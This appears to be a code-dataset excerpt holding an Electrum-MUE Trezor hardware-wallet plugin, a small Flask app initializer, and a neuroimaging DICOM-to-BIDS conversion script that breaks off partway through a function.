source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
trezor.py | import traceback
import sys
from typing import NamedTuple, Any
from electrum_mue.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_mue.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_mue.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum_mue import constants
from electrum_mue.i18n import _
from electrum_mue.plugin import Device
from electrum_mue.transaction import deserialize, Transaction
from electrum_mue.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_mue.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum_mue.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
    """Keystore backed by a Trezor hardware device.

    Delegates all signing operations to the device via the plugin's client.
    """
    hw_type = 'trezor'
    device = TREZOR_PRODUCT_KEY

    def get_derivation(self):
        # BIP32 derivation path prefix configured for this keystore.
        return self.derivation

    def get_client(self, force_pair=True):
        # Ask the plugin for a (possibly newly paired) device client.
        return self.plugin.get_client(self, force_pair)

    def decrypt_message(self, sequence, message, password):
        # Trezor integration here does not expose message encryption/decryption.
        raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))

    def sign_message(self, sequence, message, password):
        """Sign `message` with the key at derivation suffix `sequence` (change, index)."""
        client = self.get_client()
        address_path = self.get_derivation() + "/%d/%d"%sequence
        msg_sig = client.sign_message(address_path, message)
        return msg_sig.signature

    def sign_transaction(self, tx, password):
        """Sign `tx` on the device; no-op if the tx already has all signatures.

        Collects the previous transactions referenced by the inputs (required
        by the Trezor protocol for legacy inputs) and the derivation paths of
        the xpubs belonging to this keystore, then delegates to the plugin.
        """
        if tx.is_complete():
            return
        # previous transactions used as inputs
        prev_tx = {}
        # path of the xpubs that are involved
        xpub_path = {}
        for txin in tx.inputs():
            pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
            tx_hash = txin['prevout_hash']
            # Legacy (non-segwit) inputs need the full previous tx for the device
            # to verify the input amount; without it, offline signing is refused.
            if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
                raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
            prev_tx[tx_hash] = txin['prev_tx']
            for x_pubkey in x_pubkeys:
                if not is_xpubkey(x_pubkey):
                    continue
                xpub, s = parse_xpubkey(x_pubkey)
                if xpub == self.get_master_public_key():
                    xpub_path[xpub] = self.get_derivation()
        self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorInitSettings(NamedTuple):
    """Settings chosen by the user in the wizard for device initialization."""
    word_count: int            # seed length in words (see strength map in _initialize_device)
    label: str                 # device label shown on the Trezor screen
    pin_enabled: bool          # whether to protect the device with a PIN
    passphrase_enabled: bool   # whether to enable BIP39 passphrase protection
    recovery_type: Any = None  # RECOVERY_TYPE_SCRAMBLED_WORDS / RECOVERY_TYPE_MATRIX; only for TIM_RECOVER
    no_backup: bool = False    # create device without backup (TIM_NEW only)
class TrezorPlugin(HW_PluginBase):
    """Electrum plugin driving Trezor hardware wallets via trezorlib."""
    # Derived classes provide:
    #
    # class-static variables: client_class, firmware_URL, handler_class,
    # libraries_available, libraries_URL, minimum_firmware,
    # wallet_class, types

    firmware_URL = 'https://wallet.trezor.io'
    libraries_URL = 'https://github.com/trezor/python-trezor'
    minimum_firmware = (1, 5, 2)
    keystore_class = TrezorKeyStore
    minimum_library = (0, 11, 0)
    maximum_library = (0, 12)
    SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
    DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
    MAX_LABEL_LEN = 32

    def __init__(self, parent, config, name):
        super().__init__(parent, config, name)
        self.libraries_available = self.check_libraries_available()
        if not self.libraries_available:
            return
        self.device_manager().register_enumerate_func(self.enumerate)

    def get_library_version(self):
        """Return the installed trezorlib version string.

        Raises LibraryFoundButUnusable if trezorlib imported but the
        module-level import block failed (TREZORLIB is False).
        """
        import trezorlib
        try:
            version = trezorlib.__version__
        except Exception:
            version = 'unknown'
        if TREZORLIB:
            return version
        else:
            raise LibraryFoundButUnusable(library_version=version)

    def enumerate(self):
        """List connected Trezor devices as generic Device tuples."""
        # If there is a bridge, prefer that.
        # On Windows, the bridge runs as Admin (and Electrum usually does not),
        # so the bridge has better chances of finding devices. see #5420
        # This also avoids duplicate entries.
        try:
            call_bridge("enumerate")
        except Exception:
            devices = trezorlib.transport.enumerate_devices()
        else:
            devices = BridgeTransport.enumerate()
        return [Device(path=d.get_path(),
                       interface_number=-1,
                       id_=d.get_path(),
                       product_key=TREZOR_PRODUCT_KEY,
                       usage_page=0,
                       transport_ui_string=d.get_path())
                for d in devices]

    def create_client(self, device, handler):
        """Open a transport to `device` and wrap it in a TrezorClientBase.

        Returns None when the transport cannot be established.
        """
        try:
            self.logger.info(f"connecting to device at {device.path}")
            transport = trezorlib.transport.get_transport(device.path)
        except BaseException as e:
            self.logger.info(f"cannot connect at {device.path} {e}")
            return None
        if not transport:
            self.logger.info(f"cannot connect at {device.path}")
            return
        self.logger.info(f"connected to device at {device.path}")
        # note that this call can still raise!
        return TrezorClientBase(transport, handler, self)

    def get_client(self, keystore, force_pair=True):
        """Return (and mark as used) the device client paired with `keystore`."""
        devmgr = self.device_manager()
        handler = keystore.handler
        with devmgr.hid_lock:
            client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
        # returns the client for a given keystore. can use xpub
        if client:
            client.used()
        return client

    def get_coin_name(self):
        # Coin name as registered in the device firmware's coin table.
        return "Testnet" if constants.net.TESTNET else "MonetaryUnit"

    def initialize_device(self, device_id, wizard, handler):
        """Ask the user how to initialize the device and run that flow.

        Blocks on the wizard loop; raises UserCancelled if initialization
        did not complete (device may be left uninitialized).
        """
        # Initialization method
        msg = _("Choose how you want to initialize your {}.\n\n"
                "The first two methods are secure as no secret information "
                "is entered into your computer.\n\n"
                "For the last two methods you input secrets on your keyboard "
                "and upload them to your {}, and so you should "
                "only do those on a computer you know to be trustworthy "
                "and free of malware."
                ).format(self.device, self.device)
        choices = [
            # Must be short as QT doesn't word-wrap radio button text
            (TIM_NEW, _("Let the device generate a completely new seed randomly")),
            (TIM_RECOVER, _("Recover from a seed you have previously written down")),
        ]

        def f(method):
            import threading
            settings = self.request_trezor_init_settings(wizard, method, device_id)
            # Run device initialization on a worker thread so the GUI loop stays live.
            t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
            t.setDaemon(True)
            t.start()
            exit_code = wizard.loop.exec_()
            if exit_code != 0:
                # this method (initialize_device) was called with the expectation
                # of leaving the device in an initialized state when finishing.
                # signal that this is not the case:
                raise UserCancelled()
        wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)

    def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
        """Thread target: run _initialize_device and report result via wizard loop exit code."""
        exit_code = 0
        try:
            self._initialize_device(settings, method, device_id, wizard, handler)
        except UserCancelled:
            exit_code = 1
        except BaseException as e:
            self.logger.exception('')
            handler.show_error(repr(e))
            exit_code = 1
        finally:
            wizard.loop.exit(exit_code)

    def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
        """Perform the actual device reset (TIM_NEW) or recovery (TIM_RECOVER)."""
        if method == TIM_RECOVER and settings.recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
            handler.show_error(_(
                "You will be asked to enter 24 words regardless of your "
                "seed's actual length.  If you enter a word incorrectly or "
                "misspell it, you cannot change it or go back - you will need "
                "to start again from the beginning.\n\nSo please enter "
                "the words carefully!"),
                blocking=True)
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        if not client:
            raise Exception(_("The device was disconnected."))
        if method == TIM_NEW:
            # Entropy strength in bits for each supported seed length.
            strength_from_word_count = {12: 128, 18: 192, 24: 256}
            client.reset_device(
                strength=strength_from_word_count[settings.word_count],
                passphrase_protection=settings.passphrase_enabled,
                pin_protection=settings.pin_enabled,
                label=settings.label,
                no_backup=settings.no_backup)
        elif method == TIM_RECOVER:
            client.recover_device(
                recovery_type=settings.recovery_type,
                word_count=settings.word_count,
                passphrase_protection=settings.passphrase_enabled,
                pin_protection=settings.pin_enabled,
                label=settings.label)
            if settings.recovery_type == RECOVERY_TYPE_MATRIX:
                handler.close_matrix_dialog()
        else:
            raise RuntimeError("Unsupported recovery method")

    def _make_node_path(self, xpub, address_n):
        """Convert an xpub + derivation suffix into a trezorlib HDNodePathType."""
        bip32node = BIP32Node.from_xkey(xpub)
        node = HDNodeType(
            depth=bip32node.depth,
            fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
            child_num=int.from_bytes(bip32node.child_number, 'big'),
            chain_code=bip32node.chaincode,
            public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
        )
        return HDNodePathType(node=node, address_n=address_n)

    def setup_device(self, device_info, wizard, purpose):
        """Prepare the device for use in the wizard (pairing, firmware check, init)."""
        devmgr = self.device_manager()
        device_id = device_info.device.id_
        client = devmgr.client_by_id(device_id)
        if client is None:
            raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
                                      _('Make sure it is in the correct state.'))
        if not client.is_uptodate():
            msg = (_('Outdated {} firmware for device labelled {}. Please '
                     'download the updated firmware from {}')
                   .format(self.device, client.label(), self.firmware_URL))
            raise OutdatedHwFirmwareException(msg)
        # fixme: we should use: client.handler = wizard
        client.handler = self.create_handler(wizard)
        if not device_info.initialized:
            self.initialize_device(device_id, wizard, client.handler)
        is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
        client.get_xpub('m', 'standard', creating=is_creating_wallet)
        client.used()

    def get_xpub(self, device_id, derivation, xtype, wizard):
        """Fetch an xpub of script type `xtype` at `derivation` from the device."""
        if xtype not in self.SUPPORTED_XTYPES:
            raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        client.handler = wizard
        xpub = client.get_xpub(derivation, xtype)
        client.used()
        return xpub

    def get_trezor_input_script_type(self, electrum_txin_type: str):
        """Map an Electrum txin type string to trezorlib's InputScriptType."""
        if electrum_txin_type in ('p2wpkh', 'p2wsh'):
            return InputScriptType.SPENDWITNESS
        if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
            return InputScriptType.SPENDP2SHWITNESS
        if electrum_txin_type in ('p2pkh', ):
            return InputScriptType.SPENDADDRESS
        if electrum_txin_type in ('p2sh', ):
            return InputScriptType.SPENDMULTISIG
        raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))

    def get_trezor_output_script_type(self, electrum_txin_type: str):
        """Map an Electrum txin type string to trezorlib's OutputScriptType."""
        if electrum_txin_type in ('p2wpkh', 'p2wsh'):
            return OutputScriptType.PAYTOWITNESS
        if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
            return OutputScriptType.PAYTOP2SHWITNESS
        if electrum_txin_type in ('p2pkh', ):
            return OutputScriptType.PAYTOADDRESS
        if electrum_txin_type in ('p2sh', ):
            return OutputScriptType.PAYTOMULTISIG
        raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))

    def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
        """Sign `tx` on the device and merge the produced signatures into it."""
        prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items() }
        client = self.get_client(keystore)
        inputs = self.tx_inputs(tx, xpub_path, True)
        outputs = self.tx_outputs(keystore.get_derivation(), tx)
        details = SignTx(lock_time=tx.locktime, version=tx.version)
        signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
        # Append SIGHASH_ALL (0x01) byte to each DER signature, as Electrum expects.
        signatures = [(bh2u(x) + '01') for x in signatures]
        tx.update_signatures(signatures)

    def show_address(self, wallet, address, keystore=None):
        """Display `address` on the device screen for user verification."""
        if keystore is None:
            keystore = wallet.get_keystore()
        if not self.show_address_helper(wallet, address, keystore):
            return
        deriv_suffix = wallet.get_address_index(address)
        derivation = keystore.derivation
        address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
        script_type = self.get_trezor_input_script_type(wallet.txin_type)

        # prepare multisig, if available:
        xpubs = wallet.get_master_public_keys()
        if len(xpubs) > 1:
            pubkeys = wallet.get_public_keys(address)
            # sort xpubs using the order of pubkeys
            sorted_pairs = sorted(zip(pubkeys, xpubs))
            multisig = self._make_multisig(
                wallet.m,
                [(xpub, deriv_suffix) for _, xpub in sorted_pairs])
        else:
            multisig = None

        client = self.get_client(keystore)
        client.show_address(address_path, script_type, multisig)

    def tx_inputs(self, tx, xpub_path, for_sig=False):
        """Convert Electrum tx inputs to trezorlib TxInputType messages.

        With for_sig=True also attaches script type, multisig info and the
        derivation path of our own key for each input.
        """
        inputs = []
        for txin in tx.inputs():
            txinputtype = TxInputType()
            if txin['type'] == 'coinbase':
                prev_hash = b"\x00"*32
                prev_index = 0xffffffff  # signed int -1
            else:
                if for_sig:
                    x_pubkeys = txin['x_pubkeys']
                    xpubs = [parse_xpubkey(x) for x in x_pubkeys]
                    multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
                    script_type = self.get_trezor_input_script_type(txin['type'])
                    txinputtype = TxInputType(
                        script_type=script_type,
                        multisig=multisig)
                    # find which key is mine
                    for xpub, deriv in xpubs:
                        if xpub in xpub_path:
                            xpub_n = parse_path(xpub_path[xpub])
                            txinputtype.address_n = xpub_n + deriv
                            break
                prev_hash = bfh(txin['prevout_hash'])
                prev_index = txin['prevout_n']
            if 'value' in txin:
                txinputtype.amount = txin['value']
            txinputtype.prev_hash = prev_hash
            txinputtype.prev_index = prev_index
            if txin.get('scriptSig') is not None:
                script_sig = bfh(txin['scriptSig'])
                txinputtype.script_sig = script_sig
            txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
            inputs.append(txinputtype)
        return inputs

    def _make_multisig(self, m, xpubs, signatures=None):
        """Build a MultisigRedeemScriptType for an m-of-n script, or None if single-key."""
        if len(xpubs) == 1:
            return None
        pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
        if signatures is None:
            signatures = [b''] * len(pubkeys)
        elif len(signatures) != len(pubkeys):
            raise RuntimeError('Mismatched number of signatures')
        else:
            # Strip the trailing sighash byte from each present signature.
            signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
        return MultisigRedeemScriptType(
            pubkeys=pubkeys,
            signatures=signatures,
            m=m)

    def tx_outputs(self, derivation, tx: Transaction):
        """Convert Electrum tx outputs to trezorlib TxOutputType messages.

        Outputs on our own change branch are described by derivation path so
        the device can hide them from the confirmation screen.
        """

        def create_output_by_derivation():
            # Output belongs to this wallet: describe it via derivation path.
            script_type = self.get_trezor_output_script_type(info.script_type)
            deriv = parse_path("/%d/%d" % index)
            multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
            txoutputtype = TxOutputType(
                multisig=multisig,
                amount=amount,
                address_n=parse_path(derivation + "/%d/%d" % index),
                script_type=script_type)
            return txoutputtype

        def create_output_by_address():
            # External output: plain address or OP_RETURN data.
            txoutputtype = TxOutputType()
            txoutputtype.amount = amount
            if _type == TYPE_SCRIPT:
                txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
                txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
            elif _type == TYPE_ADDRESS:
                txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
                txoutputtype.address = address
            return txoutputtype

        outputs = []
        has_change = False
        any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)

        for o in tx.outputs():
            _type, address, amount = o.type, o.address, o.value
            use_create_by_derivation = False

            info = tx.output_info.get(address)
            if info is not None and not has_change:
                index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
                # prioritise hiding outputs on the 'change' branch from user
                # because no more than one change address allowed
                # note: ^ restriction can be removed once we require fw
                # that has https://github.com/trezor/trezor-mcu/pull/306
                if info.is_change == any_output_on_change_branch:
                    use_create_by_derivation = True
                    has_change = True

            if use_create_by_derivation:
                txoutputtype = create_output_by_derivation()
            else:
                txoutputtype = create_output_by_address()
            outputs.append(txoutputtype)

        return outputs

    def electrum_tx_to_txtype(self, tx, xpub_path):
        """Convert a (previous) Electrum transaction to a trezorlib TransactionType."""
        t = TransactionType()
        if tx is None:
            # probably for segwit input and we don't need this prev txn
            return t
        d = deserialize(tx.raw)
        t.version = d['version']
        t.lock_time = d['lockTime']
        t.inputs = self.tx_inputs(tx, xpub_path)
        t.bin_outputs = [
            TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
            for vout in d['outputs']
        ]
        return t
|
from flask import Flask
from config import DevConfig, ProdConfig
import threading

# Create the Flask application and load the development configuration.
# NOTE(review): ProdConfig is imported but DevConfig is always applied — confirm intended.
app = Flask(__name__)
app.config.from_object(DevConfig)

# Imported after `app` exists because these modules register routes against it.
from app import routes, control, mock

# Start the control thread if it isn't running
if "ControlThread" not in [thread.name for thread in threading.enumerate()]:
    controlthread = threading.Thread(target=control.controlworker, name="ControlThread", daemon=True)
    controlthread.start()
|
inc_dcm2bids.py | #!/usr/bin/env python
# ## PIPELINE: inc_dcm2bids.py
# ## USAGE: python3 inc_dcm2bids.py --template=<templatefile> --trange=<days> [OPTIONS]
# * requires python3, freesurfer, FSL (calls FSL via python subprocess)
#
# ## Author(s)
#
# * Amy K. Hegarty, Intermountain Neuroimaging Consortium, University of Colorado Boulder
# * University of Colorado Boulder
#
# ## Product
#
# FSL Pipelines
#
# ## License
#
# <!-- References -->
# [FSL]: https://fsl.fmrib.ox.ac.uk/fsl/fslwiki
# [pybids]: Yarkoni et al., (2019). PyBIDS: Python tools for BIDS datasets. Journal of Open Source Software, 4(40), 1294, https://doi.org/10.21105/joss.01294
# Yarkoni, Tal, Markiewicz, Christopher J., de la Vega, Alejandro, Gorgolewski, Krzysztof J., Halchenko, Yaroslav O., Salo, Taylor, ... Blair, Ross. (2019, August 8). bids-standard/pybids: 0.9.3 (Version 0.9.3). Zenodo. http://doi.org/10.5281/zenodo.3363985
#
import os, sys, getopt, glob, re, bids, json, warnings, subprocess, multiprocessing
from subprocess import PIPE
from os import path
import pandas as pd
import os.path, time
import datetime as dt
from pathlib import Path
import collections
import smtplib, ssl
# ------------------------------------------------------------------------------
# Show usage information for this script
# ------------------------------------------------------------------------------
def print_help():
    """Print command-line usage for this script to stdout."""
    print("""
Intermountain Neuroimaging Consortium Dicom 2 BIDS conversion
Usage: """ + """ --template=<bids-template> --trange=<days> [OPTIONS]
OPTIONS
-h --help show this usage information and exit
-i --template [JSON] study template describing naming convention
-t --trange time range (days) for dicom retreival (range starts today)
-c --nifti-convert (default false) run conversion to nifti for
scanner dicoms. Output in bids format
-l --subject-id-key provide a key for M803 number and subject ids (overrides accession #)
format: (csv) column 1: run(1)/skip(0)
column 2: dicom path (USRI/Study date and time
column 3: subject id
column 4: (optional) session id
-w --suppress-warnings (default false) suppress warings on terminal
** OpenMP used for parellelized execution of XXX. Multiple cores (CPUs)
are recommended (XX cpus for each fmri scan).
** see github repository for more information and to report issues:
https://github.com/intermountainneuroimaging/dcm2bids.git
""")
# ------------------------------------------------------------------------------
# Parse arguments for this script
# ------------------------------------------------------------------------------
def parse_arguments(argv):
    """Parse command-line arguments for the dcm2bids pipeline.

    Args:
        argv: argument list (typically sys.argv[1:]).

    Returns:
        An `args` object carrying wd, bidstemplate, trange, runconvert,
        suppresswarnings, pidkey and the templates path.

    Raises:
        Exception: if a required argument is missing or the template file
            does not exist.  Exits with status 2 on unparsable options.
    """
    # initialize arguments
    print("\nParsing User Inputs...")
    runconvert = False
    warns = False
    pidkey = ""
    bidstemplate = None
    trange = None
    # Scratch working directory under the user's home.
    # (Replaces the original `os.popen('echo $HOME/scratch')` shell round-trip.)
    wd = os.path.join(os.path.expanduser("~"), "scratch")
    try:
        opts, _extra = getopt.getopt(
            argv, "hi:t:l:cw",
            ["template=", "trange=", "help", "nifti-convert",
             "subject-id-key=", "suppress-warnings"])
    except getopt.GetoptError:
        print_help()
        sys.exit(2)
    for opt, arg in opts:
        if opt in ("-h", "--help"):
            print_help()
            sys.exit()
        elif opt in ("-i", "--template"):
            bidstemplate = arg
            if not os.path.exists(bidstemplate):
                raise Exception("BIDS study template does not exist")
        elif opt in ("-t", "--trange"):
            trange = arg
        elif opt in ("-c", "--nifti-convert"):
            runconvert = True
        elif opt in ("-l", "--subject-id-key"):
            pidkey = arg
        elif opt in ("-w", "--suppress-warnings"):
            warns = True
    # Required-argument checks.  (The original had unreachable `sys.exit()`
    # statements after these raises; they have been removed.)
    if bidstemplate is None:
        print_help()
        raise Exception("Missing required argument -i [--template]")
    if trange is None:
        print_help()
        raise Exception("Missing required argument -t [--trange]")

    class args:
        """Simple bag of the parsed pipeline settings."""
        def __init__(self, wd, bidstemplate, trange, runconvert, warns, pidkey):
            self.wd = wd
            self.bidstemplate = bidstemplate
            self.trange = trange
            self.runconvert = runconvert
            self.suppresswarnings = warns
            self.pidkey = pidkey
            # Location of the helper job-script templates (site-specific path).
            self.templates = "/projects/amhe4269/banichlab_ldrc_preproc/inc_resources/scanner_check/v2.0/"

    entry = args(wd, bidstemplate, trange, runconvert, warns, pidkey)
    return entry
# # ------------------------------------------------------------------------------
# # Main Pipeline Starts Here...
# # ------------------------------------------------------------------------------
def worker(name, cmdfile):
    """Executes the bash script"""
    # Run the command line and capture both streams as text; subprocess.run
    # waits for completion, just like Popen + communicate() did.
    completed = subprocess.run(cmdfile.split(), stdout=PIPE, stderr=PIPE,
                               universal_newlines=True)
    print(completed.stdout)
    print(completed.stderr)
    print("worker: " + name + " finished")
    return
# define functions
def list_diff(list1, list2):
    """Return the elements of list1 not present in list2 (order/duplicates not preserved)."""
    remaining = set(list1).difference(list2)
    return list(remaining)
def last_4chars(x):
    """Return the trailing four characters of x (the whole string if shorter)."""
    start = max(len(x) - 4, 0)
    return x[start:]
# load study heuristic file...
def heuristic(entry):
    """Load the study template JSON and cache its fields as attributes on this function.

    Side effects: sets heuristic.studyname, .scannerpath, .bidspath, .subregexp,
    .sesregexp, .t1wregexp, .strexp and .data for use by later pipeline stages.

    Raises:
        Exception: if the configured bids or scanner directory does not exist.
    """
    # load study template
    with open(entry.bidstemplate) as f:
        data = json.load(f)
    # get study specifics from heuristic file
    heuristic.studyname=data['Acquisition'][0]['Study'][0]['name']
    heuristic.scannerpath=data['Acquisition'][0]['Study'][0]['scanner_regexp']
    # check bids path if defined
    if 'bids' in data['Acquisition'][0]['Study'][0]:
        heuristic.bidspath=data['Acquisition'][0]['Study'][0]['bids']
        if heuristic.bidspath != "":
            #check bids directory exists...
            if not path.exists(heuristic.bidspath):
                raise Exception([heuristic.bidspath + " does not exist!"] )
    else:
        # NOTE(review): sets a local, not heuristic.bidspath — later code reading
        # heuristic.bidspath would fail in this branch; confirm intended.
        bidspath=[]
    # get regular expressions for T1w for ascension command
    heuristic.subregexp=data['Acquisition'][0]['Subject'][0]['scanner_regexp']
    heuristic.sesregexp=data['Acquisition'][0]['Session'][0]['scanner_regexp']
    heuristic.t1wregexp=data['Acquisition'][0]['anat'][0]['scanner_regexp']
    # check scanner path exists...
    if not path.exists(heuristic.scannerpath):
        raise Exception([heuristic.scannerpath + " does not exist!"] )
    # Glob expression locating the first dicom of each T1w series.
    heuristic.strexp=heuristic.scannerpath + '/' + heuristic.subregexp + '/' + heuristic.sesregexp + '/' + heuristic.t1wregexp + '_????/*0001-1.dcm'
    heuristic.data=data
def get_pidkey(entry):
    """Load the optional subject-id key CSV.

    Returns an empty DataFrame when no key file was supplied; otherwise the
    CSV (no header) with rows flagged 0 in column 0 removed.
    """
    if not entry.pidkey:
        return pd.DataFrame()
    key = pd.read_csv(entry.pidkey, header=None)
    print("Using Key:")
    print(key)
    # Drop rows whose first column is 0 (marked "skip").
    key.drop(key[key[0] == 0].index, inplace=True)
    return key
# Get Subject / Session Set
def new_scans(entry):
    """Find scanner acquisitions modified within the requested time range and process them.

    For each new acquisition: determine subject/session id (from the key CSV or
    from the DICOM accession via ./accession.sh), map it to BIDS names, convert
    to nifti, and accumulate a report that is emailed at the end.
    """
    # check time ids for all recent file transfers - if within time domain report...
    today = dt.datetime.now().date()
    start_date = today - dt.timedelta(days=int(entry.trange))
    print("Searching for DICOMS: " + start_date.strftime("%Y-%m-%d") + " to " + today.strftime("%Y-%m-%d") + "... ")
    # pull all recent files...
    flag_newscan = False
    alltxt=""
    key = get_pidkey(entry)
    #add entry to log
    bidspath = heuristic.data['Acquisition'][0]['Study'][0]['bids']
    f = open(bidspath+"/tmp/dcm2bids.key", "a")
    # NOTE(review): `today` is a date, so %H:%M:%S renders 00:00:00 — confirm intent.
    f.write("Entry: "+today.strftime("%m/%d/%Y, %H:%M:%S")+"\n")
    f.close()
    # Shell `find` for study directories modified in the last `trange` days.
    files=subprocess.check_output("cd "+heuristic.scannerpath+"; find M803*/Study* -maxdepth 0 -mtime -"+entry.trange,shell=True)
    files = files.decode().strip().split('\n')
    if files[0]:
        for f in files:
            # Lazily build the BIDS layout only once, on the first hit.
            if 'layout' not in locals():
                layout = make_bidsobject(bidspath)
            # ppath = s.join(fpath)
            ppath=heuristic.scannerpath+"/"+f
            print("\nAcquisition...")
            print(ppath)
            print(" ")
            study = heuristic.data['Acquisition'][0]['Study'][0]['name']
            subdigit = heuristic.data['Acquisition'][0]['Subject'][0]['digits']
            sesdigit = heuristic.data['Acquisition'][0]['Session'][0]['digits']
            scannerID=ppath.split('/')[-2]
            s="/"
            scannertimedate=s.join(ppath.split('/')[-2:])
            filetime = dt.datetime.fromtimestamp(os.path.getmtime(ppath))
            scandate=filetime.date().strftime("%Y-%m-%d")
            if key.empty:
                # No key CSV: pull subject/session from the DICOM accession number.
                filepath=ppath + '/' + heuristic.t1wregexp + '_????/*0001-1.dcm'
                dicomfile=subprocess.check_output("ls "+filepath,shell=True)
                dicomfile=dicomfile.decode().strip().split('\n')
                print("Pulling Subject ID from DICOM accession...")
                process = subprocess.Popen(['./accession.sh',dicomfile[0]], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
                out, err = process.communicate()
                out = out.strip('\n')
                print(err)
                out = out.replace('rray','') # special rule for rray study...
                out = out.replace('cbd','') # special rule for cbdx study...
                out = out.replace('cwb','') # special rule for cwb study...
                if '/' in out:
                    pid = out.split('/')[1].zfill(subdigit) # pull subject ID from accession number
                    if len(out.split('/')) > 2:
                        ses = out.split('/')[2] # pull session ID from accession number
                        ses = ses.strip('s').strip('S').zfill(sesdigit)
                    else:
                        ses = "none"
                else:
                    pid = out
                    ses = "none"
                if not pid: # if pid is empty (issue with accession)
                    pid="unknown"
            else:
                # Key CSV supplied: look this acquisition up by scanner time/date.
                index = key.index[key[1] == scannertimedate].tolist()
                print(index)
                if not index:
                    continue
                pid = str(key.loc[index[0],2])
                if len(key.columns) > 3:
                    ses = key[3][index[0]]
                else:
                    ses = "none"
            print("Running for sub-" + str(pid) + " ses-" + str(ses))
            ff = open(bidspath+"/tmp/dcm2bids.key", "a")
            ff.write("Convert sub-" + str(pid) + " ses-" + str(ses)+"\n")
            ff.close()
            # match image with template info
            new_aquisitions = make_bidsname(entry,ppath,pid,ses,heuristic.data,layout)
            # convert new aquisitions to nifit
            nifti_convert(entry,new_aquisitions,heuristic.data)
            # generate report text
            rptext = make_textreport(study,scannertimedate,pid,ses,scandate)
            print(rptext)
            # add to summary scanner email (for all studies)
            if not os.path.exists("email.txt"):
                fo=open("email.txt","w+")
                fo.write("Subject: " + "[inc_scanner_report] " + "Scanner Check : date range " + str(start_date) + " to " + str(today) + "\n\n" )
                fo.close()
            fo = open('email.txt', 'a')
            fo.write(rptext + "\n\n")
            # Close the file
            fo.close()
            alltxt=alltxt+rptext + "\n\n"
            flag_newscan = True
    if not flag_newscan:
        print("No aquisitions in selected time range")
    if flag_newscan:
        sendemail(alltxt,heuristic.data,entry)
# END new_scans
def make_bidsobject(bidspath):
    """Create (if needed) a minimal BIDS dataset at `bidspath` and return its pybids layout.

    Writes a stub dataset_description.json when the directory or file is missing.
    """
    if not os.path.exists(bidspath) or not os.path.exists(bidspath +'/' + 'dataset_description.json'):
        os.makedirs(bidspath,exist_ok=True)
        # make dataset_description file...
        data = {
            'Name': 'Intermountain Neuroimaging Consortium Dataset',
            "BIDSVersion": "1.1.1",
            "CodeURL": "",
            "HowToAcknowledge": ""}
        with open(bidspath + '/' + 'dataset_description.json', 'w') as outfile:
            json.dump(data, outfile, indent=2)
    print("\n...Loading BIDS Object \n")
